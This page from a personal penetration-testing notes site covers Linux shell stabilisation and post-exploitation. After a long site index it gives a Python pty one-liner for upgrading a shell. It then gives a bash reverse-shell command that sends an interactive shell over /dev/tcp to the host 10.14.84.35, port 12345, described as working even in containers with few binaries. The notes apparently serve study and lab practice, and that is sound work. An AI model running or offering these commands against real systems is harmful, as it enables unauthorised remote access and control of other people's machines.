Cyber Security Notes

Linux - Stabilisation & Post Exploitation

Cyber Security Notes

Index
Attacking Web Applications
Attacking Web Applications
Binary Exploitation
Binary Exploitation
- How to use GDB
Cryptography
Cryptography
- Pretty Good Privacy (PGP)
- Asymmetric Encryption
  Asymmetric Encryption
  - RSA
    RSA
    
    RSA Attacks
    
    RSA Basics
- Symetric Encryption
  Symetric Encryption
  - AES
    AES
    
    AES Basics
General Pentesting
General Pentesting
- Data Exfiltration
- Miscellaneous Tools
- Miscellaneous Services
- Pivoting
- Port Scanning
- Password Attacks
  Password Attacks
  - Offline Password Attacks
  - Online Password Attacks
Miscellaneous
Miscellaneous
- Machine Learning & AI Attacks
  Machine Learning & AI Attacks
  - Creating Malicious Tensorflow Models
Pentesting Linux
Pentesting Linux
- Priviliage Escalation
- Linux - Stabilisation & Post Exploitation Linux - Stabilisation & Post Exploitation
  Table of contents
  - Stabilising the shell
    
    Python
  - Getting a Reverse Shell In Limited Binaries Environment
    
    Bash
Pentesting Windows
Pentesting Windows
- Creating Robust Reverse Shells
- Enumerating Windows
- Network Enumeration
- Windows - Stabilisation & Post Exploitation
- Windows Commands
- Windows Local Persistence
- Windows Privilage Escalation
- Windows Tools
- Active Directory
  Active Directory
  - Enumerating Users
  - Hashes & Tokens
    Hashes & Tokens
    
    ASREPRoasting
    
    Dumping Hashes
  - Post Exploitation
    Post Exploitation
    
    Enumaration of Active Directory
  - Remote Management
    Remote Management
    
    evil-winrm
- Windows Services
  Windows Services
  - Pentesting MS-SQL
  - SMB Protocol
Reverse Engineering & Forensics
Reverse Engineering & Forensics
- Memory Analysis
  Memory Analysis
- Reversing Python
  Reversing Python
  - Decompile .elf & .exe Binaries.md

Linux - Stabilisation & Post Exploitation¶

It's a good practice to stabilise the shell before moving on to post-exploitation activities.

Stabilising the shell¶

Python¶

Upgrade shell with Python

python3 -c 'import pty; pty.spawn("/bin/bash")'

Getting a Reverse Shell In Limited Binaries Environment¶

In some cases, you may execute commands on the target machine, but the target machine may not have the binaries you need to establish a reverse shell, such as nc, python, or perl.

Bash¶

This bash reverse shell is a one-liner that can be used to establish a reverse shell on the target machine. It works perfectly on most Linux machines, even on containers that have limited binaries.

#https://medium.com/opsops/getting-reverse-shell-into-dorker-container-6b0e16483bf2
/bin/bash -c 'bash -i >& /dev/tcp/10.14.84.35/12345 0>&1'